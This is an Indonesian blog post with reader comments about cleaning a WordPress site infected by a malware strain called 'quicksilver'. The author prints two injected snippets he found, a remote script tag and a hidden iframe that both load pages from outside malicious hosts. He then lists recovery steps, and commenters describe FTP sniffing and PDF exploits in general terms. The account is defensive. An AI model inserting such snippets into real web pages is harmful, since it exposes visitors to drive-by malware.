Bangaip Sandalnya Dicopot (lagi)

(*Lagi-lagi cerita yang sifatnya teknis. Maaf. Pencopot sandal adalah istilah yang digunakan beberapa orang teman terhadap perilaku memanipulasi kode-kode bahasa komputer*)

Kaget juga saya tiba-tiba beberapa jam lalu pihak hosting mengumumkan bahwa semua pelanggannya harus ganti kata sandi di website mereka.

Ternyata ada jenis varian baru dari malware bernama quicksilver yang coba menginfeksi semua website yang ada di server tempat mereka hosting.

Waktu diberitahu hal tersebut, dalam hati sempat saya kecewa. Kira-kira, beginilah hati saya yang kecewa dan lalu berdialog akibat isengnya;

si abang: “Ini hosting kerjanya kok nggak bener yaa. Udah berapa kali pencopot sandal masuk ke web gua. Kok yaa admin udah dikasih tau berkali-kali, e-eh keamanannya nggak dikuatin. Minimal beli pager yang tinggian dikit dah biar malingnya kalo lagi manjat keliatan gituh. Atawa, nyewa centeng yang didandanin seragam item-item ama golok, biar keliatan ada nyang jagain”

si arip: “Lo udah dapet sponsor hosting gratis aja minta macem-macem”

si abang: “Ini bukan masalah gratis apa enggak. Ini masalah kualitas mas bro! Udah berani ngasih penawaran, berani dong tanggung jawab”

si arip: “Dasar mental priyayi. Mao enaknya doang. Nggak tau malu luh. Minta-minta nggak pake ngasih. Emangnya dia bapak moyang luh. Kalo dikasih gratis trus murah, lo tau diri dong! Bantuin tuh orang. Kan bukan cuman lo doang yang kesusahan. Pasti dia jauh lebih pusing. Bayangin, semua konsumennya pasti buang bacot ke dia. Dan coba bayangin kalo diantara semua konsumennya sementara lo lah yang paling sopan. Bantuin men. Jangan banyak omong. Bantu!”

Wah. Kaget saya. Sumpah. Saya malu. Dimaki-maki diri sendiri.

Walhasil, mulailah saya introspeksi diri. Dengan cara:

1. Menuju halaman website saya yang berbasis wordpress. Dan lalu melihat kode HTML mentah. Walaupun ini tehnik quick and dirty, namun ternyata dapat menemukan fakta menarik. Ada kode script php yang digenerasi diantara </head> dan <body>.  Saking canggihnya, umumnya kode ini ada di header.php di wordpress. Namun setelah dilihat-lihat di header dan file php lainnya, tidak ada satupun kode yang kelihatannya ajaib. Canggih kan. Ini script yang digenerasinya;
<script src=http://rivercoastcasino.com/images/image.php ></script>

2. Langsung menonaktifkan seluruh plugin di WP dan hanya menyisakan WordPress Exploit Scanner Donncha. Dan terlihatlah kembali hal yang ajaib. Ternyata di root WP terdapat iFrame. Nah, iFrame ini rupanya digunakan pencopot sandal dalam melakukan aksinya untuk mencapai apa yang ia inginkan. Untuk mengetahui lebih lanjut apa isi iFrame-nya. Ini saya bongkar:
# <iframe src=’http://mystabcounter.info/index2.php’ width=’6′ height=’6′ style=’visibility: hidden;’></iframe>

3. Dari data diatas, dapat dilihat ada website bernama mystabcounter.info. Web itu adalah salah satu website yang diblok oleh firewall saya. Ternyata web ini setelah dilacak ulang, rupanya gemar melakukan bombardir data. Pemboman ini sebenarnya adalah alih fungsi untuk menutupi kegiatan asli mereka yaitu mengintip perilaku pengunjung.  Jadi, dapat disimpulkan bahwa itu adalah malware. Perangkat lunak nakal yang mencoba mengintip isi celana dalam kita semua. (*Iiiih amit-amit jabang bayi deh. Kalo mao ngintip, intipin noh celana dalem sendiri!*)

4. Ternyata <iframe> tersebut ada di sebuah file di root bernama rmwyo dan rmwyo.bak. Ajaibnya, setelah dihapus berkali-kali, ia tetap muncul. Disini kecurigaan saya bahwa server tempat numpang sementara ternoda sudah, nampaknya terbukti. Saya yakin, ini bukan yang pertama kali kegadisan server terenggut oleh perilaku cabul pendekar pemetik bunga. Sebab setelah ditelusuri diatas kepemilikan root saya, file ini punya nama yang berbeda namun berisi sama, yaitu jemari nakal para pemetik bunga. Aahhh… Nakalnya ia.

5. Kalau sudah begini, tinggal satu kata, backup semua data secara bersih tanpa melibatkan MySql. Sebab nampaknya kalau sudah mampu menggandakan diri sendiri di semua level root user, ini adalah malware yang cukup jahat. Untunglah ada fasilitas wordpress bernama export, dimana semua tulisan dan komentar pengunjung dapat diunduh secepat dan sekomplit mungkin tanpa melibatkan tabulasi data SQL.

6. Minta pihak hosting menghapus akun dan lalu membuat setup baru. Dan memberitahu mereka bahwa varian Malware tersebut berasal dari Ukraina yang lebih lengkapnya dapat di baca di blog unmaskparasites di sini.

7. Instal ulang wordpress dan import kembali semua file xml back-up yang telah ada di desktop.

Maka, pelajaran hari ini yang saya dapatkan adalah:

Kalau mau memetik bunga, cucilah tangan terlebih dahulu. Kalau mau mengintip celana, jangan celana dalam saya!

hahaha

(Maaf theme nya diganti dulu untuk sementara. Ini kebetulan saja ada di cadangan theme saya. Sori atas ketidaknyamanan ini)

This entry was posted in bangaip, sehari-hari and tagged . Bookmark the permalink.

9 Responses to Bangaip Sandalnya Dicopot (lagi)

  1. hedi says:

    walah saya malah lebih nyaman dengan theme ini, bang 😉

    –0–

    Terimakasih Mas Hedi. Saya jadikan komentar ini sebagai bahan motivasi untuk tetap dengan theme ini. :)

  2. Azhar says:

    ^^^ sepakat ama yang diatas ;D
    Asyik nah, datang2 dapat ilmu baru.. Emang top dah… 😀

    –0–

    Makaciih :)

  3. oCHa says:

    wogh! saya pernaaaahh….dan saya jengkel, sehingga harus menghapus blog saya tanpa mengekspor DB, dan alhasil postingan beberapa bulan diawal tahun 2009 hilang semua! 😥

    –0–

    Semoga kalau terjadi lagi di masa depan, sudah punya penangkalnya 😉

  4. adipati kademangan says:

    mata saya ladi lebih ringan dengan wajah yang baru ini.

    –0–

    Terimakasih Adipati atas supportnya :)

  5. mbelGedez™ says:

    .
    Eh…. Selama inih yang ada dalem benak sayah adalah, hackers pecahan Uni Soviet canggih-canggih…

    Ndak taunya digibas pendekar dari Cilincing modyar semua….

    😆

    –0–

    Whahaha, nggak ahh. Saya nggak secanggih itu Mas Mbel. Kebetulan aja lagi beruntung punya temen yang ngasih tau kalo rambut bangaip dot org kutuan. Dan lebih beruntung ketika menemukan kutu kupret itu ternyata dari Rusia. Hehehe

  6. Wah, saya malah baru tahu ada istilah2 keren: “pencopot sandal”, “pemetik bunga”, dll.

    Trims tips-nya bang.

    –0–

    Sama-sama Mas Dewo :)

  7. sandalian says:

    Mas Arif, saya baru tahu mengenai aktivitas stalking dan data mining menggunakan malicious code di website seperti yang yang Mas tulis.

    Dalam beberapa kasus yang saya alami, rupanya malware bercokol di PC client yang mempunyai akses FTP ke server. Hal ini terlihat dari amannya situs tersebut setelah password FTP/Cpanel diganti.

    Tetapi hanya beberapa menit setelah password dikembalikan seperti semula, website tersebut sudah diinjeksi script lagi.

    Juga dari log server di /var/log/messages, ada aktivitas akses FTP dari suatu mesin meskipun pemilik mesin mengaku tidak melakukan apa-apa.

    Kemudian mengenai script iframe di website, script tersebut sepertinya digunakan untuk “menularkan” malware ke komputer lain yang menggunakan browser abal-abal. Sehingga malware akan terdownload otomatis oleh pengunjung yang datang ke website yang telah diinjeksi tersebut.

    Atau mungkin memang ada beberapa modus operandi yang digunakan ya..

    Waduh ternyata panjang juga komentar saya he..he..

  8. bangaip says:

    @Sandalian:

    Mas Yeni, saya yakin komen balasan saya juga bakalan panjang. Jadi saya tidak balas di kolom utama :)

    Saya setuju sama Mas Yeni. AFAIK, Quicksilver ini termasuk salah satu varian yang paling diperbincangkan di webhostingtalk. Diantaranya karena:

    1. Bisa masuk lewat FTP client bahkan yang opensource sekalipun. Dulu CuteFTP yang paling sering dijadikan kambing hitam. Sekarang, bahkan server FileZilla (patch terbaru) aja bisa tembus.

    2. Akibat paranoia di atas, saya (dan beberapa teman) bahkan sampai ‘lari’ ke CyberDuck (FTP Mac) demi kenyamanan GUI (hehe). Walaupun sebenernya lebih baik pakai FTPS/SFTP, maka ini hanya disarankan sebagai solusi sementara. Umumnya beberapa hosting mencharge biaya tambahan untuk SFTP/FTPS. Namun ga masalah, yang penting aman sih :) (*Saya pikir, sekarang akibat serangannya makin canggih, ada baiknya pihak hosting menyediakan layanan ini kali yaa sebagai basis service*)

    3. Modusnya masih sama. Sniffing via ftp > Masukin trojan > Mengembangkan bot di root user > Menduplikasi diri di subfolder root > Membuat back-up otomatis > Dan setiap backup otomatis dihapus akan menggandakan diri/membuat backup baru sambil melapor ke server bot utama untuk menutup backdoor.

    4. Yang baru, pada tahap menduplikasi diri ia juga bakal menularkan malwarenya melalui exploit PDF. Jadi dalam hal ini, ia akan menginfeksi manusia-manusia yang memakai ‘browser abal-abal’ (*Oh! I love this term. I believe none in 14820 NE 36th St, Redmond will be hurt if we use this term 😀 *) ketika mendownload file-file PDF dari web saya. Maka dengan serta merta, semua PDF di web ini langsung di scanning. Hebatnya, PDF di bangaip.org semuanya tidak apa-apa. Hanya, apabila ada pengunjung download melalui ‘browser abal-abal itu’ maka exploit akan bekerja menunggangi PDF. Canggih.

    5. Yang baru lagi, ini serangan bergelombang. Jadi kalau gelombang pertama tidak mempan, ia akan mendapatkan serangan gelombang kedua (bedanya, pakai server yang sama sekali berbeda. Jujur saja, tadinya saya kira saudara-saudara kita RRC yang iseng). Serangannya, kadang bisa mencapai tiga ratusan lebih. (yang tentu saja bisa kita lihat di /var/log). Sadis euy

    6. Bot ini benar-benar silent. Sejak awal September, kami pikir ia tidak melakukan pengiriman data apa-apa ke server masternya. Ini jelas mengecoh monitor POST dan GET (sebab mereka pikir nggak ada apa-apa). Sebab ia bersembunyi dan menunggangi data valid, maka monitor menyangka bahwa itu bukan trojan.

    Banyak orang yang menyangka phishing pada akun hotmail awal oktober 09 ini (Google passphrase: “Update: Phishing scheme affecting some Hotmail customers”) ada hubungannya dengan quicksilver. Tapi saya pikir, kalo memang bisa dibuktikan, yaa silahkan. Kalau tidak, yaah, konspirasi baru dong. Hehe.

    Maaf Mas Yeni, ini bukan jawaban. Hanya sekedar pelengkap. Mas Yeni jauh lebih ok ulasannya daripada saya. Maklum, saya bukan cowok terminal lagi (yang setiap hari melototin terminal). Hehe.

  9. perempuan says:

    cowok terminal hahaha… yg suka ama si putty

    –0–

    Hehe. Kalo under MS, pasti pakai putty. Kalau dibawah *NIX, banyak pilihannya, tapi kalo nggak salah semuanya namanya Terminal :)

Leave a Reply